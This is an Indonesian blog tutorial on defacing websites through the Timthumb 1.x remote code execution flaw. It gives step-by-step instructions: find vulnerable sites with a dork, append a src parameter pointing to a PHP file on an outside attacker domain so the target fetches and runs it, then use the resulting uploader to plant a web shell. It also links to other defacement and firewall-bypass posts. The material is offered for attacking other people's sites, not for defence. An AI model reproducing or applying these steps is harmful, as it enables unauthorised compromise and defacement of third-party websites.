Deface metode Timthumb exploit 1.x RCE.

Hello Welcome Back Dengan saya Zero_S

Kali ini saya akan memberikan tutorial deface dengan method Deface metode Timthumb exploit 1.x RCE. 

Tapi Sebelum lanjut ke metode berikut alangkah baiknya untuk visitor yang baru hadir atau sudah lama untuk baca artikel sebelumnya karna masih banyak artikel sebelumnya yang menarik untuk kalian pelajari.

Dork:     lihat di sini

Exploit :   ?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php

Cari target menggunakan drok di atas / kembangin biar dapet perawan.

• baca juga 

• Deface Method 31337FileExists and Upload Shell

• Bypass Firewalls dengan History DNS

• Cara Patch Bug SQL-INJECTION

• Metode Bypass SQL Injection 403 Forbidden

1.      Kalian droking dork di atas , jika sudah ketemu  web yang vuln seperti ini :

Bug nya ada di : site:timthumb.php / yang lain nya tergantung bugnya letak di mana

Kalo vuln dia akan keluar seperti itu , note : kalo version di atas 2 tidak bisa

2.      Lalu masukan exploitnya : ?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php

Maka keluar seperti ini

3.      Yang saya kotakan itu adalah letak shell nya

4.      Setelah kalian copy lalu pastekan akan muncul uploader , dan silahkan upload shell kalian J

Sekian Tutorial Dari Saya ,Mohon Maaf Kalau kurang jelas

TerimaKasih